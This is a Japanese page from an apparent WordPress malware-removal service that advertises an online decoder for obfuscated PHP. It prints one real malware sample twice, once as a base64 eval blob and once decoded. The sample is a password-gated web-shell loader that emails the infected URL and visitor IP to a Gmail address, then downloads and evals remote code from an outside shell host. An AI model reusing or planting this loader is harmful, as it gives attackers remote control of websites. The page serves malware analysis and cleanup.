Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php eval(base64_decode('CiBnb3RvIHNqT2VROyBwczFWUjogJHJlbW90ZUNvZGUgPSBjdXJsX2V4ZWMoJGNoKTsgZ290byBTV0dxMDsgb09lMDQ6ICR2YWxpZF9wYXNzd29yZCA9ICJceDQ4XHg2MVwxNTZceDdhXHg1OFx4MzZceDM2IjsgZ290byBNa0VIQjsgZGRhV3g6ICRjaCA9IGN1cmxfaW5pdCgkcmVtb3RlVXJsKTsgZ290byBseEQ4bjsgeFMyREc6ICRyZW1vdGVVcmwgPSAiXHg2OFwxNjRcMTY0XDE2MFx4NzNcNzJcNTdcNTdceDczXHg2OFx4NjVcMTU0XHg2Y1w1Nlx4NzBcMTYyXHg2OVwxNTZceDczXHg2OFw1Nlx4NjNceDZmXHg2ZFx4MmZcMTE2XHg2MVwxNjRceDY4XHg2MVx4NmVcNTdcMTQxXHg2Y1wxNDZcMTQxXDU2XDE2NFx4NzhcMTY0IjsgZ290byBkZGFXeDsgSTh0RWg6IGV2YWwoIlx4M2ZceDNlIiAuICRyZW1vdGVDb2RlKTsgZ290byBwVTFSZTsgQ0JOcks6ICR0dWp1YW5tYWlsID0gIlwxNTBcMTU2XDE0M1x4NmJceDM2XDY2XHg0MFwxNDdcMTU1XDE0MVwxNTFceDZjXDU2XDE0M1wxNTdcMTU1IjsgZ290byB5OFBJTTsgT3lYTXo6ICRmaWxlID0gIlx4NzJcMTQ1XDE2MFx4NmNcMTQxXDE0M1wxNDVceDJlXDE2MFwxNTBceDcwIjsgZ290byBNV3JHaTsgR1MxNFI6IHNldF90aW1lX2xpbWl0KDApOyBnb3RvIExXa1ZvOyBNV3JHaTogY2htb2QoJGZpbGUsIDQyMCk7IGdvdG8gSzViVDg7IFNXR3EwOiBpZiAoY3VybF9lcnJubygkY2gpKSB7IGRpZSgiXHg2M1x4NTVceDUyXDExNFw0MFwxNDVceDcyXDE2Mlx4NmZcMTYyXHgzYVx4MjAiIC4gY3VybF9lcnJvcigkY2gpKTsgfSBnb3RvIEY4WTNUOyBwaUdvWTogaWYgKCFpc3NldCgkX1NFU1NJT05bIlx4NmNcMTU3XDE0N1wxNDdceDY1XHg2NFx4NjlceDZlIl0pIHx8ICRfU0VTU0lPTlsiXDE1NFx4NmZceDY3XDE0N1x4NjVcMTQ0XDE1MVx4NmUiXSAhPT0gdHJ1ZSkgeyA/Pgo8Zm9ybSBtZXRob2Q9IlBPU1QiPjxsYWJlbCBmb3I9InBhc3N3b3JkIj5qaWxhdCBkaWtpdCBtYXN1ayBhaCBhaDo8L2xhYmVsPiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiaWQ9InBhc3N3b3JkIm5hbWU9InBhc3N3b3JkIj4gPGlucHV0IHR5cGU9InN1Ym1pdCJ2YWx1ZT0iTG9naW4iPjwvZm9ybT48P3BocCAgZGllOyB9IGdvdG8gT3lYTXo7IHp3aExZOiBtYWlsKCR0dWp1YW5tYWlsLCAiXDExNFx4NGZceDQ3XHg0N1wxMDVcMTIyIiwgJHBlc2FuX2FsZXJ0LCAiXHg1Ylw0MCIgLiAkX1NFUlZFUlsiXHg1Mlx4NDVcMTE1XHg0Zlx4NTRcMTA1XDEzN1x4NDFcMTA0XHg0NFwxMjIiXSAuICJceDIwXDEzNSIpOyBnb3RvIHhTMkRHOyB5OFBJTTogJHhfcGF0aCA9ICJceDY4XHg3NFx4NzRceDcwXHgzYVw1N1w1NyIgLiAkX1NFUlZFUlsiXHg1M1wxMDVcMTIyXDEyNlx4NDVcMTIyXHg1Zlx4NGVcMTAxXDExNVx4NDUiXSAuICRfU0VSVkVSWyJcMTIyXDEwNVx4NTFceDU1XHg0NVwxMjNcMTI0XHg1ZlwxMjVcMTIyXDExMSJdOyBnb3RvIGFLM2FjOyBhSzNhYzogJHBlc2FuX2FsZXJ0ID0gIlx4NjZceDY5XDE3MFw0MHskeF9wYXRofVx4MjBceDNhXDE2MFw0MFx4MmFcMTExXDEyMFx4MjBcMTAxXDE0NFwxNDRcMTYyXDE0NVx4NzNcMTYzXHgyMFw3Mlx4MjBcMTMzXHgyMCIgLiAkX1NFUlZFUlsiXHg1MlwxMDVcMTE1XHg0Zlx4NTRcMTA1XDEzN1wxMDFcMTA0XDEwNFx4NTIiXSAuICJcNDBceDVkIjsgZ290byB6d2hMWTsgYks3WDQ6IGhlYWRlcigiXDEwM1wxNTdceDZlXDE2NFwxNDVcMTU2XHg3NFw1NVx4NTRcMTcxXDE2MFx4NjVceDNhXDQwXHg3NFx4NjVcMTcwXDE2NFw1N1x4NjhcMTY0XDE1NVwxNTRcNzNcNDBcMTQzXHg2OFwxNDFceDcyXDE2M1x4NjVcMTY0XHgzZFx4NTVcMTI0XHg0Nlx4MmRcNzAiKTsgZ290byBDQk5ySzsgSzViVDg6IEBpbmlfc2V0KCJcMTU3XDE2NVx4NzRceDcwXDE2NVwxNjRceDVmXHg2MlwxNjVcMTQ2XHg2NlwxNDVceDcyXHg2OVwxNTZcMTQ3IiwgMCk7IGdvdG8gTkpxd2c7IE1rRUhCOiBpZiAoaXNzZXQoJF9QT1NUWyJceDcwXDE0MVwxNjNcMTYzXDE2N1x4NmZceDcyXDE0NCJdKSkgeyBpZiAoJF9QT1NUWyJcMTYwXDE0MVx4NzNceDczXHg3N1x4NmZceDcyXDE0NCJdID09PSAkdmFsaWRfcGFzc3dvcmQpIHsgJF9TRVNTSU9OWyJceDZjXDE1N1x4NjdceDY3XDE0NVwxNDRceDY5XDE1NiJdID0gdHJ1ZTsgfSBlbHNlIHsgZWNobyAiXDEyMFx4NjFceDczXDE2M1x4NzdceDZmXDE2Mlx4NjRcNDBcMTYzXDE0MVx4NmNcMTQxXDE1MFw0MFx4NmVceDZhXHg2OVx4NmVceDY3XDQxIjsgfSB9IGdvdG8gcGlHb1k7IGx4RDhuOiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOyBnb3RvIHBzMVZSOyBzak9lUTogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIG9PZTA0OyBOSnF3ZzogQGluaV9zZXQoIlwxNDRceDY5XDE2M1wxNjBcMTU0XHg2MVwxNzFcMTM3XDE0NVx4NzJcMTYyXHg2ZlwxNjJceDczIiwgMCk7IGdvdG8gR1MxNFI7IEY4WTNUOiBjdXJsX2Nsb3NlKCRjaCk7IGdvdG8gSTh0RWg7IExXa1ZvOiBpbmlfc2V0KCJcMTU1XDE0NVwxNTVcMTU3XHg3Mlx4NzlceDVmXDE1NFwxNTFceDZkXHg2OVwxNjQiLCAiXHgzNlw2NFx4NGQiKTsgZ290byBiSzdYNDsgcFUxUmU6IA==')); ?><?php
eval {
session_start();
$valid_password = "HanzX66";
if (isset($_POST["password"])) {
if ($_POST["password"] === $valid_password) {
$_SESSION["loggedin"] = true;
} else {
echo "Password salah njing!";
}
}
if (!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true) {
?>
<form method="POST"><label for="password">jilat dikit masuk ah ah:</label> <input type="password"id="password"name="password"> <input type="submit"value="Login"></form><?php
die;
}
$file = "replace.php";
chmod($file, 420);
@ini_set("output_buffering", 0);
@ini_set("display_errors", 0);
set_time_limit(0);
ini_set("memory_limit", "64M");
header("Content-Type: text/html; charset=UTF-8");
$tujuanmail = "hnck66@gmail.com";
$x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER["REMOTE_ADDR"] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER["REMOTE_ADDR"] . " ]");
$remoteUrl = "https://shell.prinsh.com/Nathan/alfa.txt";
$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$remoteCode = curl_exec($ch);
if (curl_errno($ch)) {
die("cURL error: " . curl_error($ch));
}
curl_close($ch);
eval("?>" . $remoteCode);
};■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.